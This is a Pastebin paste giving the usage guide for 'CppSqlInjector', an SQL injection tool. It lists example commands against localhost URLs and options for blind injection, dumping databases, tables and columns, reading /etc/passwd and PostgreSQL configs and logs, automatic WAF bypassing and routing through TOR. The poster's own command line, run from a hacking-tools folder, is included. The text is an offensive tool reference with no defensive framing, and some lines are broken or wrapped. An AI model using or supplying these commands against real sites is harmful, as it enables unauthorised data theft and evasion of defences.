Advertisement
Kyfx

CppSqlInjector Guide Lines

Mar 19th, 2015
498
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.00 KB | None | 0 0
  1. My setted up :L C:\Users\samsung\Documents\Hacking\Tools\CppSqlInjector v1.6 beta\"CppSqlInjector v.1.6 beta" url -dbs -log:dumped.txt -andM For Example
  2.  
  3.  
  4.  
  5.  
  6. Examples:
  7. ---------
  8. Expl1: 'CppSqLinjector.exe' http://127.0.0.1/1.php?id=2 -qM -cls:db:users -log:l
  9. og1
  10. Expl2: 'CppSqLinjector.exe' http://127.0.0.1/2.php?pd=1&sk=2 -andM -p:pd=1 -log:
  11. log2
  12. Expl3: 'CppSqLinjector.exe' http://127.0.0.1/3.php -andM -POST:fs=1&bh=2 -log:lo
  13. g3
  14. Expl4: 'CppSqLinjector.exe' http://127.0.0.1/4.php?id=3 -orM -read1:/etc/passwd
  15. -log:log4
  16.  
  17.  
  18.  
  19.  
  20.  
  21. Methods:
  22. --------
  23. -andM | Uses the And Method(Blind)
  24. red
  25. -orM | Uses the Or Method(Blind)
  26. red
  27. -qM | Uses the Quotation Marks Method(Blind)
  28. red
  29.  
  30. Logs:
  31. -----
  32. -log:File | Logs Dumped Data in File
  33. red
  34.  
  35. Requests:
  36. ---------
  37. -POST=PostData | Injects in POST
  38. -p:Param=Value | Injects the Given Parameter
  39.  
  40. Data Retreival:
  41. ---------------
  42. -dbs | Get Databases + Schemas in PostgreSql
  43. -tbs:DB|SCH | Get Tables of a specific Database|Schema
  44. -cls:DB|SCH:TB | Get Columns of a specific Database|Schema:Tab
  45. -data:DB|SCH:TB:CL| You got the Idea...
  46.  
  47. File Reading:
  48. -------------
  49. -read1:FILE | Gets the Content of that File IF possible(MyS
  50.  
  51. -read3 | Gets the Names of Log Files(PostgreSql)
  52.  
  53. -read4:LogFILE | Gets the Content of that Log IF possible(Post
  54.  
  55. -read5 | Gets the Content of Config IF possible(Postgr
  56.  
  57.  
  58. Comparison:
  59. -----------
  60. -string:Value | Searches for the Value on a 'TRUE' Page
  61.  
  62. Complications:
  63. --------------
  64. -si | Uses String Injection|Parantheses|etc...
  65. -wafbypass | Uses the Auotmatic WAF Bypassing System
  66. -tor | Uses TOR
  67.  
  68. Extras:
  69. -------
  70. -frs | Follows Redirections while Injecting
  71. -nocm | Removes Last Comments (Ex: --) from Sql Query
  72. -mobile | Uses a Mobile's User Agent
  73. -help | Shows this Message
  74.  
  75. ##### No Method Provided #####
  76.  
  77.  
  78.  
  79. CppSqlInjector commands
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement